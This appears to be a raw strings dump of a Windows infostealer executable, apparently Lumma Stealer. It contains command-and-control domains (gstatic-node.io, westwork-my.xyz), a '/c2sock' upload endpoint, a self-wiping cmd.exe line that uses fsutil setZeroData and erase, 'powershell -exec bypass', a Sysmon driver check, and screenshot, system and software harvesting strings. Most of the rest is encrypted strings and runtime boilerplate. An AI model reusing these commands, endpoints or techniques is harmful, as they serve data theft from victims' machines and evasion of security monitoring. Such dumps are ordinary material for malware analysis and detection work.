!This program cannot be run in DOS mode.$
`.rdata
@.data
.reloc
ARQRAPAQAVAWATASAUI
A]A[A\A_A^AYAXZYAZ
USWVP1
USWVP1
tyM#l$(
D$(\3@
D$,hPSE
qC~]=l
D$`SSh!@
t$`SSS
?uvkD$
D$P9D$
f9\$Ht
t$$B9T$
f;D$"tM
f;D$"u$
f;D$Jt
@(;D$dv'
+F@;F$
^0;^4s
^0;^4s
F0;F4s
+N@;N$
rW;n4s
F0;F4s
n0;n4s
V0;V4s
F0;F4s
N0;N4s
F0;F4s
~0;~4s
^0;^4s
T$8j8RQP
^H9{(s
T$<tU1
u(G;|$
D$`PRV
|$()T$
L$H)L$
WWWWWP
t$hSSSSSP
L$ PQV
t$ SSSSSP
t$ SSSSSP
t$0SPV
t$8h\qA
D$$j8P
SSSSPQ
VVVVPW
L$0QPV
SSSSSP
D$4PQR
x8G;|$
VVVVVV
Gtw=lheJ
D$%"D$&$
UUUUUh
UUUUUU
t$`hXkE
t$\UUUU
l$$h@kE
V0;V4s
F0;F4s
F0;F4s
N0;N4s
N0;N4s
N0;N4s
N0;N4s
F0;F4s
N0;N4s
n0;n4s
V0;V4s
N0;N4s
N0;N4s
F0;F4s
|$$f;D$
\$Dj"j
V);D$\
C;L$Dr
D$$hPSE
t$ h"uE
D$ hPSE
t$ h.uE
t$,hLQE
t$$hLQE
v8QQQQQQQ
vHQQQQQQ
~y=P>X9
t$(PVS
~?=kheJ
VVVVVh
$lheJ1
VC20XC00
PRRRRR
<ItC<Lt3<Tt#<h
A<lt'<tt
V +V4+
tb9^4~]
PRRRRR
uj*Xf;
<j*Xf;
Tt)jhZf;
JjlZf;
V.jx_f;
~ +~4+
F.jgYf;
j0Z9~4t
j0Z9~4t
j0Z9~4t
<ItC<Lt3<Tt#<h
A<lt'<tt
V +V4+
tb9^4~]
j"^f92
j"_f9z
PWWWWW
PVVVVV
PVVVVV
:u"f9z
WPWWWS
WWWSHSh
PVVVVV
_PVVVVV
j"_SVVVV
WVVVVV
PVSRSQV
UQPXY]Y[
URPQQh
M$j"^QRRRRR
M,j"^QRRRRR
Vj0XPW
r!SSPVQ
dr#SSjdVQ
j"[VWWWW
QQSVWd
QQSVj8j@
t^j*Yf
D8(Ht5F
L:-^_[
D8(Ht'
f9:t!V
j-Xf9E
u kE$<
<at.<rt!<wt
<=upG8
PPPPPVW
PP9E u!PPSVP
^PQQQQQ
E ^PQQQQ
CY< u
PPPPPPPP
RtlRandomEx
436f55b82c1c0adb311625cc6d0a3bdb311625cc260b0ad32616
26e296295690f94f4f8ef3074f8cf0467981f74a4e87
%1.17g
\u0000
\u0001
\u0002
\u0003
\u0004
\u0005
\u0006
\u0007
\u000b
\u000e
\u000f
\u0010
\u0011
\u0012
\u0013
\u0014
\u0015
\u0016
\u0017
\u0018
\u0019
\u001a
\u001b
\u001c
\u001d
\u001e
\u001f
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
OpenProcess
TerminateProcess
CloseHandle
ntdll.dll
ZwRaiseHardError
Qkkbal
stream end
need dictionary
file error
stream error
data error
out of memory
buf error
version error
parameter error
no error
undefined error
too many files
file too large
unsupported method
unsupported encryption
unsupported feature
failed finding central directory
not a ZIP archive
invalid header or archive is corrupted
unsupported multidisk archive
decompression failed or archive is corrupted
compression failed
unexpected decompressed size
CRC-32 check failed
unsupported central directory size
allocation failed
file open failed
file create failed
file write failed
file read failed
file close failed
file seek failed
file stat failed
invalid parameter
invalid filename
buffer too small
internal error
file not found
archive is too large
validation failed
write callback failed
total errors
H6VvGi
xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Disposition: form-data; name="
Content-Type: attachment/x-object
not initialized
invalid entry name
entry not found
invalid zip mode
invalid compression level
no zip 64 support
memset error
cannot write data to entry
cannot initialize tdefl compressor
invalid index
header not found
cannot flush tdefl buffer
cannot write entry header
cannot create entry header
cannot write to central dir
cannot open file
invalid entry type
extracting data using no memory allocation
file not found
no permission
out of memory
invalid zip archive name
make dir error
symlink error
close archive error
capacity size too small
fseek error
fread error
fwrite error
fltlib.dll
RtlComputeCrc32
cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=%lu "%s" & erase "%s" & exit
Undefined Version
Windows 2000
Windows XP 32
Windows XP Professional 64
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2
Windows 10
Windows Server 2016
cd9baf0081eec26dacd89d2cedd9da69a1ff8f32fda99c32f9ab990a
41f77d2b0dbe39030d82104620d7346f68cd5d
- ComputerNameDnsHostname:
- ComputerNameNetBIOS:
%s (%d.%d.%d)
- Screen Resoluton:
- Physical Installed Memory:
LoadLibraryW
InternetOpenW
InternetConnectA
InternetCloseHandle
HttpOpenRequestW
HttpSendRequestA
InternetReadFile
Content-Type: application/x-www-form-urlencoded
lid=%s&j=%s&ver=3.0
(null)
CorExitProcess
[aOni*{
~ $s%r
@b;zO]
v2!L.2
IND)ind)X
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
AreFileApisANSI
CompareStringEx
InitializeCriticalSectionEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
UTF-16LEUNICODE
1#QNAN
1#SNAN
Unknown exception
bad exception
?5Wg4p
%S#[k =
"B <1=
_hypot
_nextafter
CloseHandle
CompareStringW
CreateDirectoryW
CreateFileA
CreateFileW
CreateProcessW
DecodePointer
DeleteCriticalSection
DeleteFileW
EncodePointer
EnterCriticalSection
ExitProcess
ExpandEnvironmentStringsW
FileTimeToSystemTime
FindClose
FindFirstFileExW
FindNextFileW
FlushFileBuffers
FreeEnvironmentStringsW
FreeLibrary
GetACP
GetCPInfo
GetCommandLineA
GetCommandLineW
GetComputerNameExA
GetConsoleMode
GetConsoleOutputCP
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDriveTypeW
GetEnvironmentStringsW
GetFileInformationByHandle
GetFileSizeEx
GetFileType
GetFullPathNameW
GetLastError
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleExW
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemTimeAsFileTime
GetTimeZoneInformation
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
InitializeCriticalSectionAndSpinCount
InitializeSListHead
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
LCMapStringW
LeaveCriticalSection
LoadLibraryA
LoadLibraryExW
LoadLibraryW
MultiByteToWideChar
PeekNamedPipe
QueryPerformanceCounter
RaiseException
ReadConsoleW
ReadFile
RtlUnwind
SetEndOfFile
SetEnvironmentVariableW
SetFilePointerEx
SetFileTime
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SystemTimeToFileTime
SystemTimeToTzSpecificLocalTime
TerminateProcess
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TzSpecificLocalTimeToSystemTime
UnhandledExceptionFilter
WideCharToMultiByte
WinExec
WriteConsoleW
WriteFile
lstrcatW
lstrcmpW
lstrcmpiW
lstrlenW
EnumDisplayDevicesA
GetDesktopWindow
GetSystemMetrics
ReleaseDC
SystemParametersInfoW
wsprintfW
BitBlt
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCW
DeleteDC
DeleteObject
GetDIBits
GetObjectW
SelectObject
RegCloseKey
RegEnumKeyExW
RegOpenKeyExW
RegQueryValueExW
WinHttpCloseHandle
WinHttpConnect
WinHttpCrackUrl
WinHttpOpen
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WinHttpSendRequest
InternetQueryDataAvailable
InternetReadFile
CryptStringToBinaryA
KERNEL32.dll
USER32.dll
GDI32.dll
ADVAPI32.dll
WINHTTP.dll
WININET.dll
CRYPT32.dll
gstatic-node.io
xxxxxxxxxxxxxxxx
westwork-my.xyz
xxxxxxxxxxxxxxxx
default
xxxxxxxxxxxxxxxxxxxxxxxx
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
ru079< #
7E7O7_7
8m9r9|9
7!7-7x7
7O8[8g8s8
;%;1;=;I;U;a;m;y;
<'<0<9<B<K<S<]<k<
1m2 3<3
6E9\9d9m9v9g:I;`;
1[3e3{3
8=9^94>9>F>
J25:i:
0U3|3L5x5|9
8^97:O:
C2H2U2b2
j0~0}1
9/:K;'<B<N<f<
3?5V5m5
,0;0f1}1
5$7m7*8
1!272)4
3-5?5Q6
;d<@>x>
:R;W;`;
7#7(7R7
:>:C:P:
=-=3=9=?=E=K=Q=
>+>V>\>
?J?P?c?
/0O0Y0
111N1}1
192B2J2
3:3A3P3Z3s3
4,4<4L4U4g4p4{4
?!?%?)?-?1?5?9?=?A?E?I?M?Q?U?Y?]?a?e?i?m?q?u?y?}?
7+8084888<8
>&>*>2>>>d>
?#?6?=?Q?`?g?o?
1,2a2w3~3
2-2A2~>
1,2:2S2[2d2m2~2
41464B4G4[4
8&9?9D9M9*:4:::@:N:
;=<K<^<i<t<
8!9M9r9
9(:U:t:T;
0H0P0V0s2
;<=D={=
7.858W;
=2>:>j>r>
9!9'9B9j9~9
:!:/:6:<:S:c:
:V;[;m;
;%<1<J=Q=x=
>4>D>I>N>i>s>
?)?8?C?H?M?n?~?
0!0&0C0n0
1-161n1
2)2Q2_2f2l2
383f3u3
4"424?4c4j4
555\5q5
1P1W1^1e1w1
3"4K4n4u4
6*6M6\6
7A7F7K7P7
:H:\:p:w:
;3;N;[;i;w;
=7=A=h=r=
!0A0$1,:
2"2[2q2
4@4G4c4j4
7=7Z7z718[8m8w8
4S4e4w4
5+5L5^5p5
262?2Y2
;5;J<^<
=*=H=\=|=
4 5?5M5U5h5s5=6
7-7:8@8F8L8s8
<"<T<`=k=r=x=
C1N1[1g1
1 2(2B2K2r2w2}2
2 3(343A3H3Q3Z3j3{3
3A4I4o6
:0;N;l;
?9?d?n?
4?4T4^4
88;>;R;\;
;8<@=E=J=e=r={=
>#>/>4>9>Z>j>
5A698Z8a8x8
9F9|<@=v=}=
8X8g8G9
= >+>;>[>a>m>
)01090A0I0g0o0
6+7,8<8M8U8e8v8
819@9L9[9n9
:%:.:7:b:
8:8W8t8
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
;H>L>P>T>X>\>`>d>h>l>p>t>x>|>
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
1 1d1p1
2 2$2,2024282<2@2D2H2T2\2d2h2l2p2t2
L2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<
(2,20242h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3(7,7074787<7@7D7H7L7P7T7X7\7`7d7
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
=$=,=4=<=D=L=T=\=d=l=t=|=
=d>h>x>|>
?0?4?@?L?P?T?X?\?`?d?p?t?x?
>,>0>L>P>|>
? ?(?4?h?
080X0x0
282X2x2
484X4x4
50585L5h5p5t5
6,606L6P6p6
7 707H7T7X7\7x7|70888<8@8D8H8L8P8T8X8\8h8l8p8t8x8|8
8 ;$;(;,;p;
ntdll.dll
xDefault
crypt32.dll
45538e52191fe131243fae173d27eb3c363ae13c6500eb26313ae035360f
aab58e5185f0f625cfdbfd38c5dbfd7e
ze4154e92ac7c3de68b6737
22fe32036e91556a4cde7662569f
362f0ee17a406988580f4a80424e2ea7595d2ea0554c6194585b
bae785b2ed82e792fe86f1d3
6cdb83d922bef7ae03a9e8852fb4ecb205bef0
f423d2eaa86fbd89954ff2b9804ca08b93468e869155b7869041
d1ec3fb8feae4dd7a69f5aca95ae
kernel32.dll
0772e02c5b3e8f4f661ec07f73139449
805e4b8ce42e65f8f82a
l[,]{: }
chrome.exe
Do you want to run a malware ?
(Crypt build to disable this message)
Warning
ntdll.dll
TeslaBrowser/5.5
/c2sock
winhttp.dll
SqDe87817huf871793q74
Content-Type: multipart/form-data; boundary=%s
advapi32.dll
SysmonDrv
ntdll.dll
25f40a9e07a2cc6833e2cc8902f24c8943e65f5b03e23c2813825da
09ebf5306482964266989a567dc58259678f9a477a889a5d649e9b596a8a815966858651799b861a
389b7c4264d7132159f72f3659ef191e71f5182740fe181e74f20a277bf4112f
ef0aca36a26ba35acf49a65f8a64be45b359be57816eab449b2a9d5f812afb06cf47ab5f83
3612671d137e087e577e066d4676066957373b505f711572457d01696a450e73527d106e165f06745a4e2b7255730b3d707d0b79536014
d42457f199453e9df4673b98b14a238288772390ba403683a0040098ba0466c1f4693698b804169da041259fb5503e87b1743685bc
9a174ab6bf763ac6fe763ed7bf4b1edeff3708d7ee36
3289e5127fe88c7e12ca897b57e791616edd8d7712cb84666ec8956276e89173
*.mbox
b62ee72f9342884cd742865fc64a865bd70bbb7bde4bc76dd75ac6
b1bbe266fcda8b0a91f88e0fd4d59615edef8a0391f98312edf78d05d0d7
2b475e6e0e262e1e4f262a0f0e1b0a065e293a0b5925371c4f1b0e1c442137024e34
769cb9aa22f4ccc412f9cbc81feedd
bfb11d62fc8b4132f2f0542e
dea973d793c81abbfeea1fbebbc707a482f916b0bfda06a4
*CACHE.PM
d26c20b6f7004fd5b30041c6a20841c2b3497cfbb3054cd4bb1e44ea81184fc4b7
d1b156b09cd03fdcf1f23ad9b4df22c38dfc37d9bdd33fc2b5
948e1368c8c3761be7ef740ddde0770dec
9fdf0e39d2be6755bf9c6250fab17a4ac3926f50f3bd674bfb
8d8589bca8e4f9cce9e4fddda8d9ecf1adc6e5d5e8ebfd
9c4e43a0d12f2accbc0d2fc9f92037d3c02b0e80df222ac5f23a
*.dat-shm
*.dat-wal
%TEMP%
powershell -exec bypass "%s"
xtpmzdu
Bec48478eb02322f7d86623ec
708563d71be01ae35ee101
20ae83e543cbf1911980e787
6181e60b07ee946609e8957f0ef39f2512f08a6215e4
5e6687603d09e80b3703f44e2d17eb092a03
1fc5749573aa13fc71b65aff6caa1a
3e25f2624e4993015b56dc114f499b165b
DISPLAY
Screen.png
tSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
Software.txt
user32.dll
System.txt
kernel32.dll
wininet.dll
ec2conf
(null)
mscoree.dll
minkernel\crts\ucrt\inc\corecrt_internal_strtox.h
__crt_strtox::floating_point_value::as_double
_is_double
__crt_strtox::floating_point_value::as_float
!_is_double
Eapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-synch-l1-2-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernel32
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-win-core-fibers-l1-1-0
api-ms-
ext-ms-
Eja-JP
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
UTF-16LEUNICODE
Eapi-ms-win-core-fibers-l1-1-1
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
%);>MPqt